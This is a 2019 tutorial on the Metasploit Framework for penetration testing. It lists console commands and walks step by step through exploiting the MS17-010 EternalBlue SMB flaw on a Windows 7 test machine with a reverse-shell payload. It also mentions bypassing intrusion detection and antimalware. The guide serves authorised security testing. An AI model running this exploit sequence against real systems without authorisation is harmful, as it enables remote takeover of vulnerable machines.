Sergey Nivens - Fotolia

Problem solve Get help with specific problems with your technologies, process and projects.

How to use Metasploit commands and exploits for penetration tests

These step-by-step instructions demonstrate how to use Metasploit for enterprise vulnerability and penetration testing.

Many years ago, I introduced the benefits of using the Metasploit Framework for security vulnerability and penetration...

testing. Then in its infancy, Metasploit has grown to be an extremely popular and valuable tool that no security professional should be without. Traditional vulnerability scanners often leave you wanting more in terms of actual evidence and that's where Metasploit shines. The tool allows you to go the extra mile and demonstrate how certain vulnerabilities can be exploited and thus how they impact your network environment.

Metasploit has exploit code for a wide range of vulnerabilities in standalone software, web servers, OSes and more -- 1,843 exploits and 541 payloads in its current 5.0 version, to be exact. Even with this massive number of exploits and payloads to choose from, it isn't enough to exploit every possible vulnerability and penetration testing scenario you come across. But then again, the framework was designed so you can write your own or use someone else's exploit code, if you're so inclined.

Let's look at how to use Metasploit's built-in exploits and payloads in a real-world testing scenario. Be forewarned that it's possible to create undesired results with Metasploit when performing tests, such as crashes or production systems left in an unstable state. As with any security testing venture, proceed with caution and have a contingency plan in the event something goes awry.

History of Metasploit

Since 2003, Metasploit has been a favorite tool among IT and security professionals looking to "exploit" vulnerabilities they uncover. Originally written in Perl, Metasploit was rewritten in Ruby a few years later and is now the go-to platform for vulnerability exploitation and development. Originally a free tool, two versions exist today: Metasploit Framework and Metasploit Pro. The Framework edition is free; the Pro edition is a commercial product intended for businesses with a bigger security budget for a GUI-based product that can automate various testing tasks, test for web vulnerabilities and offer API integration.

Need-to-know Metasploit commands

Below is an example of a Metasploit test using the free Metasploit Framework. I will be testing for WannaCry, a worm that exploited a vulnerability in the Microsoft Server Message Block protocol known as EternalBlue.

Before jumping into the specific steps to execute this exploit, there are some common Metasploit console commands you should know about. The Metasploit console is referred to as msfconsole, which also happens to be the name of the batch file that starts up the program.

 Commands you should be familiar with include:

  • help (or '?' without the quotes) shows the available commands in msfconsole;
  • show exploits shows the exploits you can run -- in our example, the windows/smb/ms17_010_eternalblue exploit;
  • show payloads shows the various payload options you can execute on the exploited system such as spawn a command shell, uploading programs to run, etc. -- in our example, the shell_reverse_tcp exploit;
  • use [exploit name] instructs msfconsole to enter into a specific exploit's environment -- for example, use windows/smb/ms17_010_eternalblue will bring up the command prompt msf5 exploit(windows/smb/ms17_010_eternalblue) >;
  • info shows a description of the specific exploit you're using along with its various options and requirements;
  • show options shows the various parameters for the specific exploit you're working with;
  • show payloads shows the payloads compatible with the specific exploit you're working with;
  • set PAYLOAD allows you to set the specific payload for your exploit -- in our example, set PAYLOAD generic/shell_reverse_tcp;
  • show targets shows the available target OSes and applications that can be exploited;
  • set TARGET allows you to select a specific target OS or application when allowed by certain exploits;
  • set RHOST allows you to set your target host's IP address -- in this example, set RHOST;
  • set LHOST allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell -- in this example, set LHOST;
  • back allows you to exit the current exploit environment you've loaded and go back to the main msfconsole prompt; and
  • exit allows you to exit the Metasploit console.

Another important command worth noting is msfupdate. Msfupdate is not a command that you run within the console, but an external program built into the Metasploit Framework. Msfupdate is a batch file located in the Metasploit Framework \bin folder that will download and update your running instance of Metasploit to the latest version.

How to use Metasploit: Real-world exploit

Now that I've described the basic commands, let's take a look at some specific steps required to carry out a real-world exploit.

My testing system is a Windows 10 workstation running the latest Metasploit Framework. My test target in this example is a Windows 7 Professional workstation that has the MS17-010 SMB vulnerability that facilitates the EternalBlue and WannaCry ransomware exploit. I chose to demonstrate the exploitation of this vulnerability because it's still very common on nearly every internal network environment I test. It's also simple to exploit and has some pretty dire consequences. I know my target system has this vulnerability because I discovered it using the Nessus vulnerability scanner. There are plenty of other vulnerability scanners, such as Nexpose and QualysGuard, that can uncover this and similar vulnerabilities as well.

This approach to finding and then exploiting vulnerabilities is the standard vulnerability and penetration testing methodology, but it's not required. You can blindly test your systems or, even better, Metasploit can do some of the legwork for you as certain exploits have detection checks to see if a system is vulnerable before exploiting it. For example, in the context of our sample exploit, there's a Metasploit module called MS17-010 SMB RCE Detection that can be launched inside the Metasploit console and can determine whether or not a system has been patched against this vulnerability.

Step 1: Start Metasploit

I load msfconsole.bat via the default installation folder of C:\metasploit-framework\bin and its command prompt comes up.

Metasploit command prompt screenshot

Note: At this point you can enter show exploits to see which exploits are available to run.

Step 2: Load an exploit to run

I enter use windows/smb/ms17_010_eternalblue to run the specific exploit I know the system is vulnerable to, and it loads up that specific exploit's environment prompt (hence the windows/smb/ms17_010_eternalblue> prompt).

Loading an exploit into Metasploit

Step 3: Show supported payloads

I then enter show payloads to determine which payloads can be sent via this exploit.

Showing payloads in Metasploit

Step 4: Set the payload option

I decide to keep things simple and have the exploit open up a reverse command shell, so I enter set PAYLOAD generic/shell_reverse_tcp. If you wish to use the meterpreter functionality built into Metasploit, you could use a similar payload of windows/meterpreter/reverse_tcp. For this exploit, all the Windows targets are the same -- Windows 7 and Server 2008 R2. Other exploits have different target options; you can set that value using the set TARGET command from above.

Setting a Metasploit payload

Step 5: Show exploit options

I then enter show options to determine the nonoptional exploit and payload parameters that don't have defaults and therefore must be set.

Showing exploit options in Metasploit

Step 6: Set the required options

I'll enter the RHOST and LHOST parameters via set RHOST and set LHOST and then enter show options one final time to make sure everything is set correctly.

Setting required options in Metasploit

Step 7: Run the exploit

Finally, I enter exploit to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system. Vulnerability and penetration testing at its finest.

Running a Metasploit exploit

You can imagine what could happen at this point if a malicious hacker compromised one of your systems in this way. That's why it's so important to hack your own systems to find and plug the holes before bad guys exploit them.

Using Metasploit: There's more

This exploit is just one example of how to use Metasploit for vulnerability and penetration testing. The good thing is that outside of the specific exploit and payload I used, most of the commands and techniques in this example can apply directly to other Metasploit-supported exploits.

Once you're used to how Metasploit operates, you'll be glad to know that it contains several advanced features. You can save your set options, log actions and even define how each payload will clean up after itself once it's done running. The neat thing about Metasploit is that it's so powerful yet so easy to use. The msfconsole is intuitive and help is always just a command away, even if that means you turn to Google or YouTube to seek out the answers.

I encourage you to play around with Metasploit in a test environment to see for yourself what it can do. It's an enlightening proof-of-concept tool to say the least. Additional Metasploit features allow you to test and/or bypass IDSes and IPSes, bypass antimalware software and integrate with Windows PowerShell.

It pleases me that there are tools like Metasploit available for the betterment of information security -- especially for the low price of $0 in the case of the Metasploit Framework. These types of tools will play a vital role in the future of improving the overall quality of software, so the more you know about them the better. With a quick Metasploit download, easy install and a few minutes familiarizing yourself with its interface, anything is possible.

This was last published in September 2019

Dig Deeper on Penetration testing, ethical hacking and vulnerability assessments